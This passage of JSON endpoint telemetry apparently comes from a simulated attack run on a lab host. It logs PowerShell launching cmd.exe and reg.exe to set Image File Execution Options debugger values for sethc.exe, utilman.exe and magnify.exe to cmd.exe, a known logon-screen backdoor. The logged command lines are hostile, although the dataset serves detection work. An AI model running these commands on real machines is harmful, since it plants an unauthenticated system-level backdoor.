"{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6884, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6884, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571824640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6884, - "process_name": "cmd.exe", - 
"process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571824800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6884, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571824800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6884, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571824800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" - }, - { - "event_type": "process", - "pid": 6884, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571824800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B4255101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\sethc.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5648, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571825390000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5648, - "process_name": "cmd.exe", - "process_path": 
"C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571825270000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5648, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571825270000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5648, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571825270000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5648, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571825270000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5648, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" - }, - { - "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\sethc.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1284, - "ppid": 5648, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571825470016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}", - "unique_ppid": 
"{42FC7E13-CB3E-5C05-0000-0010122A5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - 
{ - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "registry", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe", - "registry_value": "sethc.exe", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "registry", - "pid": 1284, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger", - "registry_value": "Debugger", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "process", - "pid": 1284, - "process_name": "reg.exe", - 
"process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571825420000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010052B5101}" - }, - { - "event_type": "process", - "pid": 5648, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571825580000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010122A5101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5036, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571825639984, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571825580000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571825580000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571825580000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" - }, - { - "event_type": 
"image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571825580000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571825580000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" - }, - { - "event_type": "process", - "pid": 5036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571825580000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010642C5101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\utilman.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7448, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571826260000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7448, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826200016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" - }, - { - "event_type": "image_load", - 
"image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7448, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826200016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7448, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826200016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7448, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826200016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7448, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826200016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" - }, - { - "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\utilman.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3444, - "ppid": 7448, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571826340000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}", - "unique_ppid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - 
"image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571826200016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571826200016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 3444, - "process_name": "reg.exe", - "process_path": 
"C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "registry", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", - "registry_value": "utilman.exe", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "registry", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger", - "registry_value": "Debugger", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - "event_type": "process", - "pid": 3444, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010BB315101}" - }, - { - 
"event_type": "process", - "pid": 7448, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571826360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010C8305101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6748, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571826509984, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826520000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826520000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826520000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": 
"C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826520000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826520000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" - }, - { - "event_type": "process", - "pid": 6748, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571826520000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101A335101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\magnify.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 8140, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571827110000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8140, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826990000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 8140, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", 
- "timestamp": 131883571826990000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8140, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826990000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8140, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571826990000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8140, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107A375101}" - }, - { - "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\magnify.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7956, - "ppid": 8140, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571827210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}", - "unique_ppid": "{42FC7E13-CB3E-5C05-0000-00107A375101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571827140000, - 
"unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", 
- "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "registry", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe", - "registry_value": "magnify.exe", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "registry", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe\\Debugger", - "registry_value": "Debugger", - "timestamp": 131883571827140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "process", - "pid": 7956, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571827300000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D385101}" - }, - { - "event_type": "process", - "pid": 8140, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571827300000, - "unique_pid": 
